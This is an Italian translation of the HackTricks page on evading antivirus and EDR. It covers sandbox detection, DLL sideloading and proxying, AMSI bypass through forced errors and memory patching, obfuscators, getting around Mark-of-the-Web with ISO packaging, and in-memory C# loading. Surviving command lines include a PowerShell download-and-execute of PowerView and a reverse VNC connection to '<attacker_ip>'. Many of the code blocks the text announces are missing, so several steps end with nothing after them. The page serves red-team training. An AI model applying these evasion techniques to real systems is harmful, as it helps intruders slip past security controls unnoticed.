Antivirus (AV) Bypass
Last updated
Last updated
Impara e pratica Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Se sei interessato a una carriera nell'hacking e a hackare l'inhackabile - stiamo assumendo! (richiesta di polacco fluente scritto e parlato).
Questa pagina è stata scritta da @m2rc_p!
Attualmente, gli AV utilizzano diversi metodi per controllare se un file è dannoso o meno, rilevamento statico, analisi dinamica e, per gli EDR più avanzati, analisi comportamentale.
Il rilevamento statico si ottiene contrassegnando stringhe o array di byte dannosi noti in un binario o script, e anche estraendo informazioni dal file stesso (ad es. descrizione del file, nome dell'azienda, firme digitali, icona, checksum, ecc.). Questo significa che utilizzare strumenti pubblici noti potrebbe farti catturare più facilmente, poiché probabilmente sono stati analizzati e contrassegnati come dannosi. Ci sono un paio di modi per aggirare questo tipo di rilevamento:
Crittografia
Se crittografi il binario, non ci sarà modo per l'AV di rilevare il tuo programma, ma avrai bisogno di qualche tipo di loader per decrittografare ed eseguire il programma in memoria.
Offuscamento
A volte tutto ciò che devi fare è cambiare alcune stringhe nel tuo binario o script per superare l'AV, ma questo può essere un compito che richiede tempo a seconda di ciò che stai cercando di offuscare.
Strumenti personalizzati
Se sviluppi i tuoi strumenti, non ci saranno firme dannose note, ma questo richiede molto tempo e impegno.
Un buon modo per controllare il rilevamento statico di Windows Defender è ThreatCheck. Fondamentalmente divide il file in più segmenti e poi chiede a Defender di scansionare ciascuno individualmente, in questo modo, può dirti esattamente quali sono le stringhe o i byte contrassegnati nel tuo binario.
Ti consiglio vivamente di dare un'occhiata a questa playlist di YouTube sull'evasione pratica degli AV.
L'analisi dinamica è quando l'AV esegue il tuo binario in un sandbox e osserva attività dannose (ad es. cercare di decrittografare e leggere le password del browser, eseguire un minidump su LSASS, ecc.). Questa parte può essere un po' più complicata da gestire, ma ecco alcune cose che puoi fare per evadere le sandbox.
Sonno prima dell'esecuzione A seconda di come è implementato, può essere un ottimo modo per bypassare l'analisi dinamica dell'AV. Gli AV hanno un tempo molto breve per scansionare i file per non interrompere il flusso di lavoro dell'utente, quindi utilizzare sonni lunghi può disturbare l'analisi dei binari. Il problema è che molte sandbox degli AV possono semplicemente saltare il sonno a seconda di come è implementato.
Controllo delle risorse della macchina Di solito le sandbox hanno pochissime risorse con cui lavorare (ad es. < 2GB di RAM), altrimenti potrebbero rallentare la macchina dell'utente. Puoi anche essere molto creativo qui, ad esempio controllando la temperatura della CPU o persino la velocità delle ventole, non tutto sarà implementato nella sandbox.
Controlli specifici della macchina Se vuoi mirare a un utente la cui workstation è unita al dominio "contoso.local", puoi fare un controllo sul dominio del computer per vedere se corrisponde a quello che hai specificato, se non corrisponde, puoi far uscire il tuo programma.
Si scopre che il nome del computer della Sandbox di Microsoft Defender è HAL9TH, quindi puoi controllare il nome del computer nel tuo malware prima della detonazione, se il nome corrisponde a HAL9TH, significa che sei all'interno della sandbox di Defender, quindi puoi far uscire il tuo programma.
Alcuni altri ottimi consigli da @mgeeky per andare contro le Sandbox
Come abbiamo detto prima in questo post, gli strumenti pubblici alla fine verranno rilevati, quindi dovresti chiederti qualcosa:
Ad esempio, se vuoi dumpare LSASS, hai davvero bisogno di usare mimikatz? O potresti usare un progetto diverso che è meno conosciuto e dumpa anche LSASS.
La risposta giusta è probabilmente la seconda. Prendendo mimikatz come esempio, è probabilmente uno dei, se non il più contrassegnato malware dagli AV e EDR, mentre il progetto stesso è super interessante, è anche un incubo lavorarci per aggirare gli AV, quindi cerca semplicemente alternative per ciò che stai cercando di ottenere.
Quando modifichi i tuoi payload per l'evasione, assicurati di disattivare l'invio automatico dei campioni in Defender, e per favore, seriamente, NON CARICARE SU VIRUSTOTAL se il tuo obiettivo è raggiungere l'evasione a lungo termine. Se vuoi controllare se il tuo payload viene rilevato da un particolare AV, installalo su una VM, prova a disattivare l'invio automatico dei campioni e testalo lì finché non sei soddisfatto del risultato.
Ogni volta che è possibile, dai sempre priorità all'uso delle DLL per l'evasione, nella mia esperienza, i file DLL sono di solito molto meno rilevati e analizzati, quindi è un trucco molto semplice da usare per evitare il rilevamento in alcuni casi (se il tuo payload ha qualche modo di essere eseguito come una DLL ovviamente).
Come possiamo vedere in questa immagine, un Payload DLL di Havoc ha un tasso di rilevamento di 4/26 in antiscan.me, mentre il payload EXE ha un tasso di rilevamento di 7/26.
Ora mostreremo alcuni trucchi che puoi usare con i file DLL per essere molto più furtivo.
DLL Sideloading sfrutta l'ordine di ricerca delle DLL utilizzato dal loader posizionando sia l'applicazione vittima che il payload dannoso affiancati.
Puoi controllare i programmi suscettibili al DLL Sideloading utilizzando Siofra e il seguente script powershell:
Questo comando restituirà l'elenco dei programmi suscettibili al DLL hijacking all'interno di "C:\Program Files\" e i file DLL che tentano di caricare.
Ti consiglio vivamente di esplorare i programmi DLL Hijackable/Sideloadable da solo, questa tecnica è piuttosto furtiva se eseguita correttamente, ma se utilizzi programmi Sideloadable DLL pubblicamente noti, potresti essere facilmente catturato.
Semplicemente posizionare una DLL malevola con il nome che un programma si aspetta di caricare, non caricherà il tuo payload, poiché il programma si aspetta alcune funzioni specifiche all'interno di quella DLL; per risolvere questo problema, utilizzeremo un'altra tecnica chiamata DLL Proxying/Forwarding.
DLL Proxying inoltra le chiamate che un programma fa dalla DLL proxy (e malevola) alla DLL originale, preservando così la funzionalità del programma e potendo gestire l'esecuzione del tuo payload.
Utilizzerò il progetto SharpDLLProxy di @flangvik
Questi sono i passaggi che ho seguito:
L'ultimo comando ci darà 2 file: un modello di codice sorgente DLL e la DLL originale rinominata.
Questi sono i risultati:
Sia il nostro shellcode (codificato con SGN) che la DLL proxy hanno un tasso di rilevamento di 0/26 in antiscan.me! Direi che è un successo.
Ti consiglio vivamente di guardare il VOD di S3cur3Th1sSh1t su twitch riguardo al DLL Sideloading e anche il video di ippsec per saperne di più su quanto abbiamo discusso in modo più approfondito.
Freeze è un toolkit per payload per bypassare gli EDR utilizzando processi sospesi, syscalls diretti e metodi di esecuzione alternativi
Puoi usare Freeze per caricare ed eseguire il tuo shellcode in modo furtivo.
L'evasione è solo un gioco del gatto e del topo, ciò che funziona oggi potrebbe essere rilevato domani, quindi non fare mai affidamento su un solo strumento, se possibile, prova a concatenare più tecniche di evasione.
AMSI è stato creato per prevenire "malware senza file". Inizialmente, gli AV erano in grado di scansionare solo file su disco, quindi se riuscivi in qualche modo a eseguire payload direttamente in memoria, l'AV non poteva fare nulla per prevenirlo, poiché non aveva abbastanza visibilità.
La funzione AMSI è integrata in questi componenti di Windows.
Controllo dell'Account Utente, o UAC (elevazione di EXE, COM, MSI o installazione ActiveX)
PowerShell (script, uso interattivo e valutazione dinamica del codice)
Windows Script Host (wscript.exe e cscript.exe)
JavaScript e VBScript
Macro VBA di Office
Consente alle soluzioni antivirus di ispezionare il comportamento degli script esponendo i contenuti degli script in una forma sia non crittografata che non offuscata.
Eseguire IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
produrrà il seguente avviso su Windows Defender.
Nota come anteponga amsi:
e poi il percorso all'eseguibile da cui è stato eseguito lo script, in questo caso, powershell.exe
Non abbiamo scaricato alcun file su disco, ma siamo stati comunque catturati in memoria a causa di AMSI.
Ci sono un paio di modi per aggirare AMSI:
Offuscamento
Poiché AMSI funziona principalmente con rilevamenti statici, quindi, modificare gli script che cerchi di caricare può essere un buon modo per evadere il rilevamento.
Tuttavia, AMSI ha la capacità di deoffuscare gli script anche se ha più strati, quindi l'offuscamento potrebbe essere una cattiva opzione a seconda di come viene fatto. Questo rende non così semplice evadere. Anche se, a volte, tutto ciò che devi fare è cambiare un paio di nomi di variabili e andrà bene, quindi dipende da quanto qualcosa è stato segnalato.
Evasione AMSI
Poiché AMSI è implementato caricando una DLL nel processo di powershell (anche cscript.exe, wscript.exe, ecc.), è possibile manometterlo facilmente anche eseguendo come utente non privilegiato. A causa di questo difetto nell'implementazione di AMSI, i ricercatori hanno trovato diversi modi per evadere la scansione di AMSI.
Forzare un Errore
Forzare il fallimento dell'inizializzazione di AMSI (amsiInitFailed) comporterà che non verrà avviata alcuna scansione per il processo corrente. Originariamente questo è stato divulgato da Matt Graeber e Microsoft ha sviluppato una firma per prevenire un uso più ampio.
Tutto ciò che serviva era una riga di codice powershell per rendere AMSI inutilizzabile per il processo powershell attuale. Questa riga è stata ovviamente segnalata da AMSI stesso, quindi è necessaria qualche modifica per utilizzare questa tecnica.
Ecco un bypass AMSI modificato che ho preso da questo Github Gist.
Keep in mind, that this will probably get flagged once this post comes out, so you should not publish any code if your plan is staying undetected.
Memory Patching
Questa tecnica è stata inizialmente scoperta da @RastaMouse e implica la ricerca dell'indirizzo per la funzione "AmsiScanBuffer" in amsi.dll (responsabile della scansione dell'input fornito dall'utente) e la sovrascrittura con istruzioni per restituire il codice per E_INVALIDARG, in questo modo, il risultato della scansione effettiva restituirà 0, che viene interpretato come un risultato pulito.
Please read https://rastamouse.me/memory-patching-amsi-bypass/ for a more detailed explanation.
Ci sono anche molte altre tecniche utilizzate per bypassare AMSI con powershell, controlla questa pagina e questo repo per saperne di più.
O questo script che tramite memory patching patcherà ogni nuovo Powersh
Ci sono diversi strumenti che possono essere utilizzati per offuscare il codice C# in chiaro, generare modelli di metaprogrammazione per compilare binari o offuscare binari compilati come:
InvisibilityCloak: C# obfuscator
Obfuscator-LLVM: L'obiettivo di questo progetto è fornire un fork open-source della suite di compilazione LLVM in grado di fornire maggiore sicurezza software attraverso l'offuscamento del codice e la protezione contro manomissioni.
ADVobfuscator: ADVobfuscator dimostra come utilizzare il linguaggio C++11/14
per generare, al momento della compilazione, codice offuscato senza utilizzare alcuno strumento esterno e senza modificare il compilatore.
obfy: Aggiunge uno strato di operazioni offuscate generate dal framework di metaprogrammazione C++ template che renderà la vita della persona che desidera craccare l'applicazione un po' più difficile.
Alcatraz: Alcatraz è un offuscante binario x64 in grado di offuscare vari file pe diversi tra cui: .exe, .dll, .sys
metame: Metame è un semplice motore di codice metamorfico per eseguibili arbitrari.
ropfuscator: ROPfuscator è un framework di offuscamento del codice a grana fine per linguaggi supportati da LLVM utilizzando ROP (programmazione orientata al ritorno). ROPfuscator offusca un programma a livello di codice assembly trasformando istruzioni normali in catene ROP, ostacolando la nostra concezione naturale del normale flusso di controllo.
Nimcrypt: Nimcrypt è un .NET PE Crypter scritto in Nim
inceptor: Inceptor è in grado di convertire EXE/DLL esistenti in shellcode e poi caricarli
Potresti aver visto questo schermo quando scaricavi alcuni eseguibili da internet ed eseguendoli.
Microsoft Defender SmartScreen è un meccanismo di sicurezza destinato a proteggere l'utente finale dall'esecuzione di applicazioni potenzialmente dannose.
SmartScreen funziona principalmente con un approccio basato sulla reputazione, il che significa che le applicazioni scaricate raramente attiveranno SmartScreen, avvisando e impedendo all'utente finale di eseguire il file (anche se il file può comunque essere eseguito cliccando su Maggiori informazioni -> Esegui comunque).
MoTW (Mark of The Web) è un NTFS Alternate Data Stream con il nome di Zone.Identifier che viene creato automaticamente al momento del download di file da internet, insieme all'URL da cui è stato scaricato.
It's important to note that executables signed with a trusted signing certificate won't trigger SmartScreen.
Un modo molto efficace per impedire che i tuoi payload ricevano il Mark of The Web è imballarli all'interno di qualche tipo di contenitore come un ISO. Questo accade perché il Mark-of-the-Web (MOTW) non può essere applicato a volumi non NTFS.
PackMyPayload è uno strumento che imballa i payload in contenitori di output per eludere il Mark-of-the-Web.
Example usage:
Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using PackMyPayload
Caricare i file binari C# in memoria è noto da un po' di tempo ed è ancora un ottimo modo per eseguire i tuoi strumenti di post-exploitation senza essere catturati dall'AV.
Poiché il payload verrà caricato direttamente in memoria senza toccare il disco, dovremo solo preoccuparci di patchare AMSI per l'intero processo.
La maggior parte dei framework C2 (sliver, Covenant, metasploit, CobaltStrike, Havoc, ecc.) forniscono già la possibilità di eseguire assembly C# direttamente in memoria, ma ci sono diversi modi per farlo:
Fork&Run
Comporta l'innesco di un nuovo processo sacrificial, iniettare il tuo codice malevolo di post-exploitation in quel nuovo processo, eseguire il tuo codice malevolo e, quando hai finito, terminare il nuovo processo. Questo ha sia vantaggi che svantaggi. Il vantaggio del metodo fork and run è che l'esecuzione avviene al di fuori del nostro processo di impianto Beacon. Questo significa che se qualcosa nella nostra azione di post-exploitation va storto o viene catturato, c'è una probabilità molto maggiore che il nostro impianto sopravviva. Lo svantaggio è che hai una maggiore probabilità di essere catturato da Rilevamenti Comportamentali.
Inline
Si tratta di iniettare il codice malevolo di post-exploitation nel proprio processo. In questo modo, puoi evitare di dover creare un nuovo processo e farlo scansionare dall'AV, ma lo svantaggio è che se qualcosa va storto con l'esecuzione del tuo payload, c'è una probabilità molto maggiore di perdere il tuo beacon poiché potrebbe bloccarsi.
Se vuoi leggere di più sul caricamento degli Assembly C#, ti consiglio di controllare questo articolo https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/ e il loro InlineExecute-Assembly BOF (https://github.com/xforcered/InlineExecute-Assembly)
Puoi anche caricare Assembly C# da PowerShell, dai un'occhiata a Invoke-SharpLoader e al video di S3cur3th1sSh1t.
Come proposto in https://github.com/deeexcee-io/LOI-Bins, è possibile eseguire codice malevolo utilizzando altri linguaggi dando alla macchina compromessa accesso all'ambiente dell'interprete installato sulla condivisione SMB controllata dall'attaccante.
Consentendo l'accesso ai file binari dell'interprete e all'ambiente sulla condivisione SMB puoi eseguire codice arbitrario in questi linguaggi all'interno della memoria della macchina compromessa.
Il repo indica: Defender scansiona ancora gli script, ma utilizzando Go, Java, PHP, ecc. abbiamo maggiore flessibilità per bypassare le firme statiche. Testare con script di reverse shell casuali non offuscati in questi linguaggi si è rivelato un successo.
L'evasione è un argomento molto complicato, a volte devi tenere conto di molte diverse fonti di telemetria in un solo sistema, quindi è praticamente impossibile rimanere completamente non rilevato in ambienti maturi.
Ogni ambiente contro cui ti scontri avrà i propri punti di forza e di debolezza.
Ti incoraggio vivamente a guardare questo intervento di @ATTL4S, per avere un'idea delle tecniche di evasione più avanzate.
Questo è anche un altro grande intervento di @mariuszbit sull'Evasione in Profondità.
Puoi usare ThreatCheck che rimuoverà parti del binario fino a scoprire quale parte Defender trova come malevola e te lo dividerà. Un altro strumento che fa la stessa cosa è avred con un'offerta web aperta che fornisce il servizio in https://avred.r00ted.ch/
Fino a Windows 10, tutte le versioni di Windows venivano fornite con un server Telnet che potevi installare (come amministratore) eseguendo:
Fallo partire quando il sistema viene avviato e eseguilo ora:
Cambia la porta telnet (stealth) e disabilita il firewall:
Scaricalo da: http://www.uvnc.com/downloads/ultravnc.html (vuoi i download binari, non il setup)
SULL'HOST: Esegui winvnc.exe e configura il server:
Abilita l'opzione Disabilita TrayIcon
Imposta una password in VNC Password
Imposta una password in View-Only Password
Poi, sposta il binario winvnc.exe e il file nuovamente creato UltraVNC.ini all'interno della vittima
L'attaccante dovrebbe eseguire all'interno del suo host il binario vncviewer.exe -listen 5900
in modo che sia pronto a catturare una connessione VNC inversa. Poi, all'interno della vittima: Avvia il demone winvnc winvnc.exe -run
e esegui winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900
ATTENZIONE: Per mantenere la furtività non devi fare alcune cose
Non avviare winvnc
se è già in esecuzione o attiverai un popup. controlla se è in esecuzione con tasklist | findstr winvnc
Non avviare winvnc
senza UltraVNC.ini
nella stessa directory o aprirà la finestra di configurazione
Non eseguire winvnc -h
per aiuto o attiverai un popup
Scaricalo da: https://github.com/GreatSCT/GreatSCT
Dentro GreatSCT:
Ora avvia il lister con msfconsole -r file.rc
e esegui il payload xml con:
L'attuale difensore terminerà il processo molto rapidamente.
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
Compilarlo con:
Usalo con:
REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066
REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639
Download ed esecuzione automatici:
Elenco di offuscatori C#: https://github.com/NotPrab/.NET-Obfuscator
Se sei interessato a una carriera nel hacking e a hackare l'inhackabile - stiamo assumendo! (richiesta fluente in polacco scritto e parlato).
Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)